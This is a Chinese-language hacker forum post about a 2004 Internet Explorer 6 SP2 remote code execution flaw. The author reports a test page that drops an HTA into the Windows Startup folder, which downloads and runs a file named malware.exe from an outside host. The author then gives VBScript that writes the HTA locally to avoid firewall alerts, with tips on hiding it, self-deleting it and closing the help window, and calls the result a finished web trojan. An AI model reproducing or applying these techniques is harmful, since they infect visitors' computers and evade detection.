利用漏洞:
Microsoft Internet Explorer SP2遠程任意命令執行漏洞
發布日期:2004-12-23
受影響系統:
Microsoft Internet Explorer 6.0SP2
- Microsoft Windows XP Professional SP2
- Microsoft Windows XP Home SP2
Microsoft Internet Explorer結合多種漏洞如Help ActiveX控件等問題,遠程攻擊者可以利用這個漏洞無需用戶交互來執行任意文件而導致惡
意代碼執行.
詳見:_bug&do=vIEw&bug_id=7272&keyWord=">綠盟
冰狐浪子的個人測試及分析
因為所公布的測試頁面是用於英文版本的winxp系統,所以用中文系統測試前,要先建立如下目錄
C:\Documents and Settings\All Users\Start Menu\Programs\Startup\
我利用所給的測試頁面進行測試,發現如果裝有防火牆,會提示應用程序alg.exe訪問網絡,選擇允許後,察看C:\Documents and Settings\All
Users\Start Menu\Programs\Startup\目錄發現被寫入一文件"Microsoft Office.hta",運行"Microsoft Office.hta",發現自動從
http://freehost07.websamba.com/greyhats/malware.exe下載並運行了一個精美的火焰DEMO,C盤根目錄下面出現malware.exe程序[需要說明的
是運行Microsoft Office.hta時防火牆並沒有報警]!
我察看代碼後發現防火牆報警的原因為writehta.txt裡的代碼是通過訪問遠程數據庫來獲得要寫入Microsoft Office.hta裡的代碼的,如果
我們不訪問數據庫而直接把hta的代碼寫到腳本裡,就可以不引起防火牆的報警啦!呵呵
方法是調用ADODB.Recordset,把用到的代碼寫為一條記錄,我也是在網上找到的代碼代碼如下:
on error resume next
set evanchik = CreateObject("ADODB.Recordset")
With evanchik
.FIElds.Append "evanchik", 200, "3000"
Call .Open
Call .AddNew
.FIElds("evanchik").Value = "meaning less shit i had to put here"
Call .AddNew
.FIElds("evanchik").Value = "此處寫上要寫到啟動目錄裡的具體代碼"
Call .Update
End With
evanchik.Save "C:\Documents and Settings\All Users\Start Menu\Programs\Startup\Microsoft Office.hta", adPersistXML
evanchik.Close
解決了防火牆問題,接下來就要看如何隱蔽開機後hta文件的運行啦,具體我就不寫啦,請參照網上以前object漏洞的利用代碼,也就是現在網上所
謂的"不閃的網頁木馬"!需要注意一點,hta最好加上自動刪除功能,這樣就運行一次後不會被後來輕易發現!
另外這個漏洞做的網頁木馬會打開一幫助文件,如果你覺得不太好的話,可以利用幫助控件裡的
Close參數進行自動關閉!
至此一個XPsp2的網頁木馬順利完工!
不足之處:
1.因為我沒找到可以直接自動運行的方法,只有寫到啟動文件夾裡,等機器重新啟動後運行hta文件,容易被發現後清除,使得木馬無法被下載運行
2.因為要調用本地的htm或chm文件,獲得寫文件權限,所以當系統不是默認安裝在C盤下時,無法寫入文件!
